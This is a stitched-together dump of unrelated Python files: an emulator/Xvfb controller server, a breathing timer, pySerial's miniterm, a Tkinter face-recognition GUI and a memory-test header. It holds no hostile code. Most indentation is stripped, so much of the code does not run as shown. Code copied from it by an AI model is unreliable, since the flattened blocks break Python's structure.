"%ix%i" % (res_w, res_h),
"--audio", "dummy",
"--input",
input_driver_path,
rom_path]
initial_disp = os.environ["DISPLAY"]
cprint('Initially on DISPLAY %s' % initial_disp, 'red')
xvfb_proc = None
if config['USE_XVFB']:
display_num = -1
success = False
# If we couldn't find an open display number after 15 attempts, give up
while not success and display_num <= 15:
display_num += 1
xvfb_cmd = [config['XVFB_CMD'],
":" + str(display_num),
"-screen",
"0",
"%ix%ix%i" % (res_w, res_h, res_d * 8),
"-fbdir",
config['TMP_DIR']]
cprint('Starting xvfb with command: %s' % xvfb_cmd, 'yellow')
xvfb_proc = subprocess.Popen(xvfb_cmd, shell=False, stderr=subprocess.STDOUT)
time.sleep(2) # Give xvfb a couple seconds to start up
# Poll the process to see if it exited early
# (most likely due to a server already active on the display_num)
if xvfb_proc.poll() is None:
success = True
print('')
if not success:
msg = "Failed to initialize Xvfb!"
cprint(msg, 'red')
raise Exception(msg)
os.environ["DISPLAY"] = ":" + str(display_num)
cprint('Using DISPLAY %s' % os.environ["DISPLAY"], 'blue')
cprint('Changed to DISPLAY %s' % os.environ["DISPLAY"], 'red')
cmd = [config['VGLRUN_CMD']] + cmd
        cprint('Starting emulator with command: %s' % cmd, 'yellow')
emulator_process = subprocess.Popen(cmd,
env=os.environ.copy(),
shell=False,
stderr=subprocess.STDOUT)
# TODO: Test and cleanup:
# May need to initialize this after the DISPLAY env var has been set
# so it attaches to the correct X display; otherwise screenshots may
# come from the wrong place. This used to be true when we were using
# wxPython for screenshots. Untested after switching to mss.
cprint('Calling mss.mss() with DISPLAY %s' % os.environ["DISPLAY"], 'red')
self.mss_grabber = mss.mss()
time.sleep(2) # Give mss a couple seconds to initialize; also may not be necessary
# Restore the DISPLAY env var
os.environ["DISPLAY"] = initial_disp
cprint('Changed back to DISPLAY %s' % os.environ["DISPLAY"], 'red')
emu_mon = EmulatorMonitor()
monitor_thread = threading.Thread(target=emu_mon.monitor_emulator,
args=[emulator_process])
monitor_thread.daemon = True
monitor_thread.start()
return xvfb_proc, emulator_process
def _kill_emulator(self):
#cprint('Kill Emulator called!', 'yellow')
try:
self._act(ControllerState.NO_OP)
if self.emulator_process is not None:
self.emulator_process.kill()
if self.xvfb_process is not None:
self.xvfb_process.terminate()
except AttributeError:
            pass  # We may be shut down during initialization before these attributes have been set
###############################################
class EmulatorMonitor:
def monitor_emulator(self, emulator):
emu_return = emulator.poll()
while emu_return is None:
time.sleep(2)
emu_return = emulator.poll()
# TODO: this means our environment died... need to die too
print('Emulator closed with code: ' + str(emu_return))
###############################################
class ControllerState(object):
# Controls
NO_OP = [0, 0, 0, 0, 0]
A_BUTTON = [0, 0, 1, 0, 0]
B_BUTTON = [0, 0, 0, 1, 0]
RB_BUTTON = [0, 0, 0, 0, 1]
JOYSTICK_UP = [0, 80, 0, 0, 0]
JOYSTICK_DOWN = [0, -80, 0, 0, 0]
JOYSTICK_LEFT = [-80, 0, 0, 0, 0]
JOYSTICK_RIGHT = [80, 0, 0, 0, 0]
def __init__(self, controls=NO_OP, start_button=0):
self.START_BUTTON = start_button
self.X_AXIS = controls[0]
self.Y_AXIS = controls[1]
self.A_BUTTON = controls[2]
self.B_BUTTON = controls[3]
self.R_TRIG = controls[4]
self.L_TRIG = 0
self.Z_TRIG = 0
def to_json(self):
return json.dumps(self.__dict__)
###############################################
class ControllerHTTPServer(HTTPServer, object):
def __init__(self, server_address, control_timeout):
self.control_timeout = control_timeout
self.controls = ControllerState()
self.hold_response = True
self.running = True
super(ControllerHTTPServer, self).__init__(server_address, self.ControllerRequestHandler)
def send_controls(self, controls, start_button=0):
#print('Send controls called')
self.controls = ControllerState(controls, start_button)
self.hold_response = False
# Wait for controls to be sent:
start = time.time()
while not self.hold_response and time.time() < start + self.control_timeout:
time.sleep(MILLISECOND)
def shutdown(self):
self.running = False
super(ControllerHTTPServer, self).shutdown()
class ControllerRequestHandler(BaseHTTPRequestHandler, object):
def log_message(self, format, *args):
pass
def write_response(self, resp_code, resp_data):
self.send_response(resp_code)
self.send_header("Content-type", "text/plain")
self.end_headers()
self.wfile.write(resp_data)
def do_GET(self):
while self.server.running and self.server.hold_response:
time.sleep(MILLISECOND)
if not self.server.running:
print('Sending SHUTDOWN response')
# TODO: This sometimes fails with a broken pipe because
# the emulator has already stopped. Should handle gracefully
self.write_response(500, "SHUTDOWN")
### respond with controller output
self.write_response(200, self.server.controls.to_json())
self.server.hold_response = True
return
###############################################
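# --- Illustrative sketch (added for clarity; not part of the original module) ---
# The emulator-side input driver is expected to poll ControllerHTTPServer with
# plain HTTP GETs and receive one ControllerState encoded as JSON per request.
# A rough, hedged stand-in for that driver (useful for testing the server
# without the emulator) could look like the helper below; urllib2 matches the
# Python 2 flavour of this file, and the port value is whatever PORT_NUMBER is
# configured to in config.yml.
def _example_poll_controls(port):
    import urllib2
    import json as _json
    # Blocks until send_controls() releases the held response on the server side.
    response = urllib2.urlopen('http://localhost:%d/' % port)
    controls = _json.loads(response.read())
    # controls is a dict such as {'X_AXIS': 0, 'Y_AXIS': 0, 'A_BUTTON': 1, ...}
    return controls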
|
breadth.py
|
import sys
import threading
import time
import keyboard
TEXT = ["BREATHE IN", "HOLD", "BREATHE OUT"]
JJ = [0, 4, 11]
def my_code():
"""
The actual function to do the breathe patterns.
It rings a ``ding`` to alert user for hold breathe in and out
"""
i = 0
j = 0
while True:
print(" "*50, "\r", end="")
if i in [0, 4, 11, 19]:
print("\t\t\t{} {}".format(TEXT[j], i - JJ[j]), "\a", end="")
else:
print("\t\t\t{} {}".format(TEXT[j], i - JJ[j]), end="")
time.sleep(1)
i = i+1
if i > 4:
j = 1
if i > 11:
j = 2
if i >= 19:
i = 0
j = 0
def main():
    my_thread = threading.Thread(target=my_code, daemon=True)
    my_thread.start()
print("Press ESC to quit")
keyboard.wait("esc")
sys.exit()
|
miniterm.py
|
#!C:\Python27\python.exe
# Very simple serial terminal
# (C)2002-2011 Chris Liechti <cliechti@gmx.net>
# Input characters are sent directly (only LF -> CR/LF/CRLF translation is
# done), received characters are displayed as is (or escaped through Python's
# repr, useful for debug purposes)
import sys, os, serial, threading
try:
from serial.tools.list_ports import comports
except ImportError:
comports = None
EXITCHARCTER = serial.to_bytes([0x1d]) # GS/CTRL+]
MENUCHARACTER = serial.to_bytes([0x14]) # Menu: CTRL+T
DEFAULT_PORT = None
DEFAULT_BAUDRATE = 9600
DEFAULT_RTS = None
DEFAULT_DTR = None
def key_description(character):
"""generate a readable description for a key"""
ascii_code = ord(character)
if ascii_code < 32:
return 'Ctrl+%c' % (ord('@') + ascii_code)
else:
return repr(character)
# help text, starts with blank line! it's a function so that the current values
# for the shortcut keys are used and not the values at program start
def get_help_text():
return """
--- pySerial (%(version)s) - miniterm - help
---
--- %(exit)-8s Exit program
--- %(menu)-8s Menu escape key, followed by:
--- Menu keys:
--- %(itself)-7s Send the menu character itself to remote
--- %(exchar)-7s Send the exit character itself to remote
--- %(info)-7s Show info
--- %(upload)-7s Upload file (prompt will be shown)
--- Toggles:
--- %(rts)-7s RTS %(echo)-7s local echo
--- %(dtr)-7s DTR %(break)-7s BREAK
--- %(lfm)-7s line feed %(repr)-7s Cycle repr mode
---
--- Port settings (%(menu)s followed by the following):
--- p change port
--- 7 8 set data bits
--- n e o s m change parity (None, Even, Odd, Space, Mark)
--- 1 2 3 set stop bits (1, 2, 1.5)
--- b change baud rate
--- x X disable/enable software flow control
--- r R disable/enable hardware flow control
""" % {
'version': getattr(serial, 'VERSION', 'unknown version'),
'exit': key_description(EXITCHARCTER),
'menu': key_description(MENUCHARACTER),
'rts': key_description('\x12'),
'repr': key_description('\x01'),
'dtr': key_description('\x04'),
'lfm': key_description('\x0c'),
'break': key_description('\x02'),
'echo': key_description('\x05'),
'info': key_description('\x09'),
'upload': key_description('\x15'),
'itself': key_description(MENUCHARACTER),
'exchar': key_description(EXITCHARCTER),
}
if sys.version_info >= (3, 0):
def character(b):
return b.decode('latin1')
else:
def character(b):
return b
LF = serial.to_bytes([10])
CR = serial.to_bytes([13])
CRLF = serial.to_bytes([13, 10])
X00 = serial.to_bytes([0])
X0E = serial.to_bytes([0x0e])
# first choose a platform-dependent way to read single characters from the console
global console
if os.name == 'nt':
import msvcrt
class Console(object):
def __init__(self):
pass
def setup(self):
pass # Do nothing for 'nt'
def cleanup(self):
pass # Do nothing for 'nt'
def getkey(self):
while True:
z = msvcrt.getch()
if z == X00 or z == X0E: # functions keys, ignore
msvcrt.getch()
else:
if z == CR:
return LF
return z
console = Console()
elif os.name == 'posix':
import termios, sys, os
class Console(object):
def __init__(self):
self.fd = sys.stdin.fileno()
self.old = None
def setup(self):
self.old = termios.tcgetattr(self.fd)
new = termios.tcgetattr(self.fd)
new[3] = new[3] & ~termios.ICANON & ~termios.ECHO & ~termios.ISIG
new[6][termios.VMIN] = 1
new[6][termios.VTIME] = 0
termios.tcsetattr(self.fd, termios.TCSANOW, new)
def getkey(self):
c = os.read(self.fd, 1)
return c
def cleanup(self):
if self.old is not None:
termios.tcsetattr(self.fd, termios.TCSAFLUSH, self.old)
console = Console()
def cleanup_console():
console.cleanup()
sys.exitfunc = cleanup_console # terminal modes have to be restored on exit...
else:
raise NotImplementedError("Sorry no implementation for your platform (%s) available." % sys.platform)
def dump_port_list():
if comports:
sys.stderr.write('\n--- Available ports:\n')
for port, desc, hwid in sorted(comports()):
#~ sys.stderr.write('--- %-20s %s [%s]\n' % (port, desc, hwid))
sys.stderr.write('--- %-20s %s\n' % (port, desc))
CONVERT_CRLF = 2
CONVERT_CR = 1
CONVERT_LF = 0
NEWLINE_CONVERISON_MAP = (LF, CR, CRLF)
LF_MODES = ('LF', 'CR', 'CR/LF')
REPR_MODES = ('raw', 'some control', 'all control', 'hex')
class Miniterm(object):
def __init__(self, port, baudrate, parity, rtscts, xonxoff, echo=False, convert_outgoing=CONVERT_CRLF, repr_mode=0):
try:
self.serial = serial.serial_for_url(port, baudrate, parity=parity, rtscts=rtscts, xonxoff=xonxoff, timeout=1)
except AttributeError:
# happens when the installed pyserial is older than 2.5. use the
# Serial class directly then.
self.serial = serial.Serial(port, baudrate, parity=parity, rtscts=rtscts, xonxoff=xonxoff, timeout=1)
self.echo = echo
self.repr_mode = repr_mode
self.convert_outgoing = convert_outgoing
self.newline = NEWLINE_CONVERISON_MAP[self.convert_outgoing]
self.dtr_state = True
self.rts_state = True
self.break_state = False
def _start_reader(self):
"""Start reader thread"""
self._reader_alive = True
# start serial->console thread
self.receiver_thread = threading.Thread(target=self.reader)
self.receiver_thread.setDaemon(True)
self.receiver_thread.start()
def _stop_reader(self):
"""Stop reader thread only, wait for clean exit of thread"""
self._reader_alive = False
self.receiver_thread.join()
def start(self):
self.alive = True
self._start_reader()
# enter console->serial loop
self.transmitter_thread = threading.Thread(target=self.writer)
self.transmitter_thread.setDaemon(True)
self.transmitter_thread.start()
def stop(self):
self.alive = False
def join(self, transmit_only=False):
self.transmitter_thread.join()
if not transmit_only:
self.receiver_thread.join()
def dump_port_settings(self):
sys.stderr.write("\n--- Settings: %s %s,%s,%s,%s\n" % (
self.serial.portstr,
self.serial.baudrate,
self.serial.bytesize,
self.serial.parity,
self.serial.stopbits))
sys.stderr.write('--- RTS: %-8s DTR: %-8s BREAK: %-8s\n' % (
(self.rts_state and 'active' or 'inactive'),
(self.dtr_state and 'active' or 'inactive'),
(self.break_state and 'active' or 'inactive')))
try:
sys.stderr.write('--- CTS: %-8s DSR: %-8s RI: %-8s CD: %-8s\n' % (
(self.serial.getCTS() and 'active' or 'inactive'),
(self.serial.getDSR() and 'active' or 'inactive'),
(self.serial.getRI() and 'active' or 'inactive'),
(self.serial.getCD() and 'active' or 'inactive')))
except serial.SerialException:
            # on RFC 2217 ports it can happen that no modem state notification
            # has been received yet. Ignore this error.
pass
sys.stderr.write('--- software flow control: %s\n' % (self.serial.xonxoff and 'active' or 'inactive'))
sys.stderr.write('--- hardware flow control: %s\n' % (self.serial.rtscts and 'active' or 'inactive'))
sys.stderr.write('--- data escaping: %s linefeed: %s\n' % (
REPR_MODES[self.repr_mode],
LF_MODES[self.convert_outgoing]))
def reader(self):
"""loop and copy serial->console"""
try:
while self.alive and self._reader_alive:
data = character(self.serial.read(1))
if self.repr_mode == 0:
# direct output, just have to care about newline setting
if data == '\r' and self.convert_outgoing == CONVERT_CR:
sys.stdout.write('\n')
else:
sys.stdout.write(data)
elif self.repr_mode == 1:
# escape non-printable, let pass newlines
if self.convert_outgoing == CONVERT_CRLF and data in '\r\n':
if data == '\n':
sys.stdout.write('\n')
elif data == '\r':
pass
elif data == '\n' and self.convert_outgoing == CONVERT_LF:
sys.stdout.write('\n')
elif data == '\r' and self.convert_outgoing == CONVERT_CR:
sys.stdout.write('\n')
else:
sys.stdout.write(repr(data)[1:-1])
elif self.repr_mode == 2:
# escape all non-printable, including newline
sys.stdout.write(repr(data)[1:-1])
elif self.repr_mode == 3:
# escape everything (hexdump)
for c in data:
sys.stdout.write("%s " % c.encode('hex'))
sys.stdout.flush()
except serial.SerialException, e:
self.alive = False
            # would be nice if the console reader could be interrupted at this
# point...
raise
def writer(self):
"""\
Loop and copy console->serial until EXITCHARCTER character is
found. When MENUCHARACTER is found, interpret the next key
locally.
"""
menu_active = False
try:
while self.alive:
try:
b = console.getkey()
except KeyboardInterrupt:
b = serial.to_bytes([3])
c = character(b)
if menu_active:
if c == MENUCHARACTER or c == EXITCHARCTER: # Menu character again/exit char -> send itself
self.serial.write(b) # send character
if self.echo:
sys.stdout.write(c)
elif c == '\x15': # CTRL+U -> upload file
sys.stderr.write('\n--- File to upload: ')
sys.stderr.flush()
console.cleanup()
filename = sys.stdin.readline().rstrip('\r\n')
if filename:
try:
file = open(filename, 'r')
sys.stderr.write('--- Sending file %s ---\n' % filename)
while True:
line = file.readline().rstrip('\r\n')
if not line:
break
self.serial.write(line)
self.serial.write('\r\n')
# Wait for output buffer to drain.
self.serial.flush()
sys.stderr.write('.') # Progress indicator.
sys.stderr.write('\n--- File %s sent ---\n' % filename)
except IOError, e:
sys.stderr.write('--- ERROR opening file %s: %s ---\n' % (filename, e))
console.setup()
elif c in '\x08hH?': # CTRL+H, h, H, ? -> Show help
sys.stderr.write(get_help_text())
elif c == '\x12': # CTRL+R -> Toggle RTS
self.rts_state = not self.rts_state
self.serial.setRTS(self.rts_state)
sys.stderr.write('--- RTS %s ---\n' % (self.rts_state and 'active' or 'inactive'))
elif c == '\x04': # CTRL+D -> Toggle DTR
self.dtr_state = not self.dtr_state
self.serial.setDTR(self.dtr_state)
sys.stderr.write('--- DTR %s ---\n' % (self.dtr_state and 'active' or 'inactive'))
elif c == '\x02': # CTRL+B -> toggle BREAK condition
self.break_state = not self.break_state
self.serial.setBreak(self.break_state)
sys.stderr.write('--- BREAK %s ---\n' % (self.break_state and 'active' or 'inactive'))
elif c == '\x05': # CTRL+E -> toggle local echo
self.echo = not self.echo
sys.stderr.write('--- local echo %s ---\n' % (self.echo and 'active' or 'inactive'))
elif c == '\x09': # CTRL+I -> info
self.dump_port_settings()
elif c == '\x01': # CTRL+A -> cycle escape mode
self.repr_mode += 1
if self.repr_mode > 3:
self.repr_mode = 0
sys.stderr.write('--- escape data: %s ---\n' % (
REPR_MODES[self.repr_mode],
))
elif c == '\x0c': # CTRL+L -> cycle linefeed mode
self.convert_outgoing += 1
if self.convert_outgoing > 2:
self.convert_outgoing = 0
self.newline = NEWLINE_CONVERISON_MAP[self.convert_outgoing]
sys.stderr.write('--- line feed %s ---\n' % (
LF_MODES[self.convert_outgoing],
))
elif c in 'pP': # P -> change port
dump_port_list()
sys.stderr.write('--- Enter port name: ')
sys.stderr.flush()
console.cleanup()
try:
port = sys.stdin.readline().strip()
except KeyboardInterrupt:
port = None
console.setup()
if port and port != self.serial.port:
# reader thread needs to be shut down
self._stop_reader()
# save settings
settings = self.serial.getSettingsDict()
try:
try:
new_serial = serial.serial_for_url(port, do_not_open=True)
except AttributeError:
# happens when the installed pyserial is older than 2.5. use the
# Serial class directly then.
new_serial = serial.Serial()
new_serial.port = port
# restore settings and open
new_serial.applySettingsDict(settings)
new_serial.open()
new_serial.setRTS(self.rts_state)
new_serial.setDTR(self.dtr_state)
new_serial.setBreak(self.break_state)
except Exception, e:
sys.stderr.write('--- ERROR opening new port: %s ---\n' % (e,))
new_serial.close()
else:
self.serial.close()
self.serial = new_serial
sys.stderr.write('--- Port changed to: %s ---\n' % (self.serial.port,))
# and restart the reader thread
self._start_reader()
elif c in 'bB': # B -> change baudrate
sys.stderr.write('\n--- Baudrate: ')
sys.stderr.flush()
console.cleanup()
backup = self.serial.baudrate
try:
self.serial.baudrate = int(sys.stdin.readline().strip())
except ValueError, e:
sys.stderr.write('--- ERROR setting baudrate: %s ---\n' % (e,))
self.serial.baudrate = backup
else:
self.dump_port_settings()
console.setup()
elif c == '8': # 8 -> change to 8 bits
self.serial.bytesize = serial.EIGHTBITS
self.dump_port_settings()
                    elif c == '7': # 7 -> change to 7 bits
self.serial.bytesize = serial.SEVENBITS
self.dump_port_settings()
elif c in 'eE': # E -> change to even parity
self.serial.parity = serial.PARITY_EVEN
self.dump_port_settings()
elif c in 'oO': # O -> change to odd parity
self.serial.parity = serial.PARITY_ODD
self.dump_port_settings()
elif c in 'mM': # M -> change to mark parity
self.serial.parity = serial.PARITY_MARK
self.dump_port_settings()
elif c in 'sS': # S -> change to space parity
self.serial.parity = serial.PARITY_SPACE
self.dump_port_settings()
elif c in 'nN': # N -> change to no parity
self.serial.parity = serial.PARITY_NONE
self.dump_port_settings()
elif c == '1': # 1 -> change to 1 stop bits
self.serial.stopbits = serial.STOPBITS_ONE
self.dump_port_settings()
elif c == '2': # 2 -> change to 2 stop bits
self.serial.stopbits = serial.STOPBITS_TWO
self.dump_port_settings()
elif c == '3': # 3 -> change to 1.5 stop bits
self.serial.stopbits = serial.STOPBITS_ONE_POINT_FIVE
self.dump_port_settings()
elif c in 'xX': # X -> change software flow control
self.serial.xonxoff = (c == 'X')
self.dump_port_settings()
elif c in 'rR': # R -> change hardware flow control
self.serial.rtscts = (c == 'R')
self.dump_port_settings()
else:
sys.stderr.write('--- unknown menu character %s --\n' % key_description(c))
menu_active = False
elif c == MENUCHARACTER: # next char will be for menu
menu_active = True
elif c == EXITCHARCTER:
self.stop()
break # exit app
elif c == '\n':
self.serial.write(self.newline) # send newline character(s)
if self.echo:
sys.stdout.write(c) # local echo is a real newline in any case
sys.stdout.flush()
else:
self.serial.write(b) # send byte
if self.echo:
sys.stdout.write(c)
sys.stdout.flush()
except:
self.alive = False
raise
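# --- Illustrative sketch (added for clarity; not part of the original script) ---
# Miniterm can also be driven programmatically instead of via main(); a rough,
# hedged example (the port name and baud rate below are placeholders):
#
#   term = Miniterm('/dev/ttyUSB0', 115200, 'N', rtscts=False, xonxoff=False)
#   console.setup()
#   term.start()              # spawns the reader (serial->console) and writer (console->serial) threads
#   try:
#       term.join(True)       # wait for the writer/keyboard thread
#   except KeyboardInterrupt:
#       pass
#   term.join()
#   console.cleanup()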
def main():
import optparse
parser = optparse.OptionParser(
usage = "%prog [options] [port [baudrate]]",
description = "Miniterm - A simple terminal program for the serial port."
)
group = optparse.OptionGroup(parser, "Port settings")
group.add_option("-p", "--port",
dest = "port",
help = "port, a number or a device name. (deprecated option, use parameter instead)",
default = DEFAULT_PORT
)
group.add_option("-b", "--baud",
dest = "baudrate",
action = "store",
type = 'int',
help = "set baud rate, default %default",
default = DEFAULT_BAUDRATE
)
group.add_option("--parity",
dest = "parity",
action = "store",
help = "set parity, one of [N, E, O, S, M], default=N",
default = 'N'
)
group.add_option("--rtscts",
dest = "rtscts",
action = "store_true",
help = "enable RTS/CTS flow control (default off)",
default = False
)
group.add_option("--xonxoff",
dest = "xonxoff",
action = "store_true",
help = "enable software flow control (default off)",
default = False
)
group.add_option("--rts",
dest = "rts_state",
action = "store",
type = 'int',
help = "set initial RTS line state (possible values: 0, 1)",
default = DEFAULT_RTS
)
group.add_option("--dtr",
dest = "dtr_state",
action = "store",
type = 'int',
help = "set initial DTR line state (possible values: 0, 1)",
default = DEFAULT_DTR
)
parser.add_option_group(group)
group = optparse.OptionGroup(parser, "Data handling")
group.add_option("-e", "--echo",
dest = "echo",
action = "store_true",
help = "enable local echo (default off)",
default = False
)
group.add_option("--cr",
dest = "cr",
action = "store_true",
help = "do not send CR+LF, send CR only",
default = False
)
group.add_option("--lf",
dest = "lf",
action = "store_true",
help = "do not send CR+LF, send LF only",
default = False
)
group.add_option("-D", "--debug",
dest = "repr_mode",
action = "count",
help = """debug received data (escape non-printable chars)
--debug can be given multiple times:
0: just print what is received
1: escape non-printable characters, do newlines as unusual
2: escape non-printable characters, newlines too
3: hex dump everything""",
default = 0
)
parser.add_option_group(group)
group = optparse.OptionGroup(parser, "Hotkeys")
group.add_option("--exit-char",
dest = "exit_char",
action = "store",
type = 'int',
help = "ASCII code of special character that is used to exit the application",
default = 0x1d
)
group.add_option("--menu-char",
dest = "menu_char",
action = "store",
type = 'int',
help = "ASCII code of special character that is used to control miniterm (menu)",
default = 0x14
)
parser.add_option_group(group)
group = optparse.OptionGroup(parser, "Diagnostics")
group.add_option("-q", "--quiet",
dest = "quiet",
action = "store_true",
help = "suppress non-error messages",
default = False
)
parser.add_option_group(group)
(options, args) = parser.parse_args()
options.parity = options.parity.upper()
if options.parity not in 'NEOSM':
parser.error("invalid parity")
if options.cr and options.lf:
parser.error("only one of --cr or --lf can be specified")
if options.menu_char == options.exit_char:
parser.error('--exit-char can not be the same as --menu-char')
global EXITCHARCTER, MENUCHARACTER
EXITCHARCTER = chr(options.exit_char)
MENUCHARACTER = chr(options.menu_char)
port = options.port
baudrate = options.baudrate
if args:
if options.port is not None:
parser.error("no arguments are allowed, options only when --port is given")
port = args.pop(0)
if args:
try:
baudrate = int(args[0])
except ValueError:
parser.error("baud rate must be a number, not %r" % args[0])
args.pop(0)
if args:
parser.error("too many arguments")
else:
# no port given on command line -> ask user now
if port is None:
dump_port_list()
port = raw_input('Enter port name:')
convert_outgoing = CONVERT_CRLF
if options.cr:
convert_outgoing = CONVERT_CR
elif options.lf:
convert_outgoing = CONVERT_LF
try:
miniterm = Miniterm(
port,
baudrate,
options.parity,
rtscts=options.rtscts,
xonxoff=options.xonxoff,
echo=options.echo,
convert_outgoing=convert_outgoing,
repr_mode=options.repr_mode,
)
except serial.SerialException, e:
sys.stderr.write("could not open port %r: %s\n" % (port, e))
sys.exit(1)
if not options.quiet:
sys.stderr.write('--- Miniterm on %s: %d,%s,%s,%s ---\n' % (
miniterm.serial.portstr,
miniterm.serial.baudrate,
miniterm.serial.bytesize,
miniterm.serial.parity,
miniterm.serial.stopbits,
))
sys.stderr.write('--- Quit: %s | Menu: %s | Help: %s followed by %s ---\n' % (
key_description(EXITCHARCTER),
key_description(MENUCHARACTER),
key_description(MENUCHARACTER),
key_description('\x08'),
))
if options.dtr_state is not None:
if not options.quiet:
sys.stderr.write('--- forcing DTR %s\n' % (options.dtr_state and 'active' or 'inactive'))
miniterm.serial.setDTR(options.dtr_state)
miniterm.dtr_state = options.dtr_state
if options.rts_state is not None:
if not options.quiet:
sys.stderr.write('--- forcing RTS %s\n' % (options.rts_state and 'active' or 'inactive'))
miniterm.serial.setRTS(options.rts_state)
miniterm.rts_state = options.rts_state
console.setup()
miniterm.start()
try:
miniterm.join(True)
except KeyboardInterrupt:
pass
if not options.quiet:
sys.stderr.write("\n--- exit ---\n")
miniterm.join()
#~ console.cleanup()
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
if __name__ == '__main__':
main()
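# Usage sketch (not part of the original script; port names and values are
# illustrative, but every option shown is defined in main() above):
#   python miniterm.py /dev/ttyUSB0 115200
#   python miniterm.py -p COM3 -b 9600 --echo --lf
#   python miniterm.py --parity E --rtscts /dev/ttyS0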
|
facerec_with_gui.py
|
# -*- coding: utf-8 -*-
#######################################
__file__ = "facerec_with_gui.py"
__author__ = "Mesut Pişkin"
__version__ = "1.0"
__email__ = "mesutpiskin@outlook.com"
#######################################
from tkinter import *
import PIL.Image
import PIL.ImageTk
import tkinter.filedialog
import face_recognition
import cv2
import os
import threading
# Form object
frame = Tk()
frame.resizable(width=FALSE, height=FALSE)
frame.title("Face Recognition GUI")
frame.geometry("1024x768")
global lblImage
video_capture = cv2.VideoCapture(0)
known_face_encodings = []
known_face_names = []
global camera_is_open
global btnOpenCamera
def trainFaces():
print("---- Training Started ----")
for root, dirs, files in os.walk("./faces"):
for filename in files:
file_result = filename.split("_")
known_face_names.append(file_result[0])
image = face_recognition.load_image_file("faces/"+filename)
image_face_encoding = face_recognition.face_encodings(image)[0]
known_face_encodings.append(image_face_encoding)
print("Name: " + file_result[0])
print("---- Training Completed ----")
def faceRecognitionFromPicture(cvframe):
print("---- Recognized Started ----")
small_frame = cv2.resize(cvframe, (0, 0), fx=0.25, fy=0.25)
# Convert the image from BGR color (which OpenCV uses) to RGB color (which face_recognition uses)
small_rgb_frame = small_frame[:, :, ::-1]
# get face location
face_locations = face_recognition.face_locations(small_rgb_frame)
print("- Face location scan completed")
face_encodings = face_recognition.face_encodings(
small_rgb_frame, face_locations)
face_names = []
for face_encoding in face_encodings:
# See if the face is a match for the known face(s)
matches = face_recognition.compare_faces(
known_face_encodings, face_encoding)
name = "not recognized" # default name is not recognized
# If a match was found in known_face_encodings, just use the first one.
if True in matches:
first_match_index = matches.index(True)
name = known_face_names[first_match_index]
face_names.append(name)
print("- Face Distance:")
face_distances = face_recognition.face_distance(known_face_encodings, face_encoding)
for i, face_distance in enumerate(face_distances):
print("The test image has a distance of {:.2} from known image #{}".format(face_distance, i))
print("- With a normal cutoff of 0.6, would the test image match the known image? {}".format(face_distance < 0.6))
print("- With a very strict cutoff of 0.5, would the test image match the known image? {}".format(face_distance < 0.5))
print("- Face Locations:")
# print face data
print(*face_locations, sep='\n')
print(*face_names, sep='\n')
print("- Face name searching completed")
# draw face rectangle and name on current frame
drawFaceOnImage(cvframe, face_locations, face_names)
# Label string
faceNames = ''.join(face_names)
count = str(len(face_locations))
location = ','.join([str(i) for i in face_locations])
return_string = "\nNames: "+faceNames + \
"\nFace Count: "+count+"\nLocations: "+location+"\n"
lblTag["text"] = return_string
print("---- Recognized Completed ----")
def drawFaceOnImage(frame, face_locations, face_names):
for (top, right, bottom, left), name in zip(face_locations, face_names):
# Scale back up face locations since the frame we detected in was scaled to 1/4 size
top *= 4
right *= 4
bottom *= 4
left *= 4
# Draw a box around the face
cv2.rectangle(frame, (left, top), (right, bottom), (153, 0, 51), 4)
# Draw a label with a name below the face
cv2.rectangle(frame, (left, top + 35),
(right, top), (153, 0, 51), cv2.FILLED)
font = cv2.FONT_HERSHEY_DUPLEX
cv2.putText(frame, name, (left + 10, top + 25),
font, 1.0, (255, 255, 255), 2)
# write temp image file for lblimage item
cv2.imwrite("temp.jpg", frame)
def openFile():
# declare the module-level flag as global so this assignment stops the
# camera loop instead of silently creating a local variable
global camera_is_open
camera_is_open = False
# open file dialog for picture
filename = tkinter.filedialog.askopenfilename(
initialdir="/", title="Choose Photo")
# recognize face
cvframe = cv2.imread(filename)
faceRecognitionFromPicture(cvframe)
# get recognized picture
im = PIL.Image.open("temp.jpg")
im = im.resize((700, 400))
photo = PIL.ImageTk.PhotoImage(im)
lblImage.configure(image=photo)
lblImage.image = photo
def openCamera():
global btnOpenCamera
global camera_is_open
if camera_is_open == False:
camera_is_open = True
btnOpenCamera["text"] = "Stop Camera"
videoThread = threading.Thread(
target=processCameraFrameForTkinter, args=())
videoThread.start()
else:
camera_is_open = False
btnOpenCamera["text"] = "Start Camera"
def processCameraFrameForTkinter():
global camera_is_open
while camera_is_open:
ret, frame = video_capture.read()
faceRecognitionFromPicture(frame)
# get recognized picture
im = PIL.Image.open("temp.jpg")
im = im.resize((960, 540))
photo = PIL.ImageTk.PhotoImage(im)
lblImage.configure(image=photo)
lblImage.image = photo
# or use cv2.imshow()
# train face in faces folder
trainFaces()
# form Components
btnOpenFile = Button(text="Recognize from photos", command=openFile)
lblTag = Label(text="",
bg="red", fg="white", font="Arial 18")
lblImage = Label()
btnOpenCamera = Button(text="Recognize from camera", command=openCamera)
btnOpenFile.pack()
btnOpenCamera.pack()
lblTag.pack()
lblImage.pack()
camera_is_open = False
mainloop()
|
memtest.py
|
# -*- coding: utf-8 -*-
#
# Copyright (C) 2012-2014 Ben Kurtovic <ben.kurtovic@gmail.com>
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
"""
Tests for memory leaks in the CTokenizer. Python 2 and 3 compatible.
This appears to work mostly fine under Linux, but gives an absurd number of
false positives on OS X. I'm not sure why. Running the tests multiple times
yields different results (tests don't always leak, and the amount they leak by
varies). Increasing the number of loops results in a smaller bytes/loop value,
too, indicating the increase in memory usage might be due to something else.
